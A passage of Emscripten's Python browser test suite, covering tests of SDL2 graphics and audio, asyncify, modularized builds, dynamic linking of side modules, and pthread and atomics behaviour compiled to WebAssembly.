args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempt to use dlopen the side module (without preloading) should fail on the main thread
# since the syncronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHEAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
